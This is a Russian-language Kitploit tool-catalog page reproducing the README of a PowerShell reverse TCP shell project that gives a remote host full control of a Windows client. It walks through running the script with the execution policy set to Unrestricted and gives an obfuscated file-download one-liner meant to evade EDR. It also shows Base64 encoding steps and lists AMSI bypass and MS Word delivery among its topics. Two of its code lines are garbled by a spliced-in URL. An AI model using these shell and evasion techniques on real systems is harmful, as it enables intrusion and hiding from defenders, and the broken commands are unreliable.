Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
powershell-reverse-tcp — Скрипты PowerShell для взаимодействия с удалённым хостом. | Kitploit
Инструменты/GitHubGitHub/ivan-sincek/powershell-reverse-tcp
Повышение привилегийЭксплуатацияОбход IDS/IPSЛатеральное перемещениеПост-эксплуатацияКомандование и УправлениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubivan-sincek/powershell-reverse-tcp

powershell-reverse-tcp

Скрипты PowerShell для взаимодействия с удалённым хостом.

Репозиторий
30065111 месяц назадПроверено Kitploit

PowerShell Reverse TCP

Скрипты PowerShell для связи с удаленным хостом.

Удаленный хост получает полный контроль над клиентом и всеми системными командами.

Доступны оболочки на основе:

  • команды PowerShell Invoke-Expression здесь,
  • каналов процессов здесь.

Протестировано с PowerShell v5.1.19041.2673 на Windows 10 Enterprise (64-разрядная версия).

Создано в образовательных целях. Надеюсь, поможет!

Этот репозиторий начал иметь известные сигнатуры, и у меня нет времени загружать новые скрипты каждый раз, поэтому вы должны обфусцировать эти скрипты самостоятельно.

Планы на будущее:

  • больше оболочек на основе каналов процессов и их дальнейшая оптимизация.

Table of Contents

  • Как запустить
  • Обфускация скриптов PowerShell
    • PowerShell Encoded Command
    • SecureString
  • Обход AMSI
  • Интеграция с MS Word
  • Настройка слушателя
  • Время выполнения

How to Run

При необходимости измените IP-адрес и номер порта в скриптах.

Откройте PowerShell из \src\invoke_expression\original\ или \src\process_pipes\original\ и выполните команды, показанные ниже.

Установите политику выполнения:```pwsh Set-ExecutionPolicy Unrestricted

Запустите скрипт:```pwsh
.\powershell_reverse_tcp.ps1

Или выполните следующую команду из PowerShell или командной строки:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

## Обфускация PowerShell-скриптов

Попробуйте обойти системы EDR и другие механизмы безопасности, обфусцируя свои скрипты. Примеры такой обфускации приведены ниже.

Оригинальная команда PowerShell:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)

Обфусцированная команда PowerShell:```pwsh & (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'

**Проверьте оригинальный скрипт PowerShell [здесь](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) и полностью обфусцированный [здесь](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1).**

После [ручной обфускации](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) оригинальный скрипт PowerShell был обфусцирован с помощью [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation). Спасибо автору!

Поищите в Интернете дополнительные методы и техники обфускации.

P.S. Поскольку PowerShell постоянно обновляется, некоторые регулярные выражения (например, `*ke-E*`) могут начать вызывать исключения из-за совпадения нескольких методов с одним и тем же выражением, поэтому выражения нужно будет немного более точно задавать.

### PowerShell Encoded Command

Чтобы создать закодированную команду PowerShell из скрипта PowerShell, выполните следующую команду PowerShell:```pwsh
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))

Чтобы декодировать закодированную команду PowerShell, выполните следующую команду PowerShell:```pwsh [Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))

Используйте однострочники ниже, если не хотите оставлять никаких следов.

---
Скачать инструмент